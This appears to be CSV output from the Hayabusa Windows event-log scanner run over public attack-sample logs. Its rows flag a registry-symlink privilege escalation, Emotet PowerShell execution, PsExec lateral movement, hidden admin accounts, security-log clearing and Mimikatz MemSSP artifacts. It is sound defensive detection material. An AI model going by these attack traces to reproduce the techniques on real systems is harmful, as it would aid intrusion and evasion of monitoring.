2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.594 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.610 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx
2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx
2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx
2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx
2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
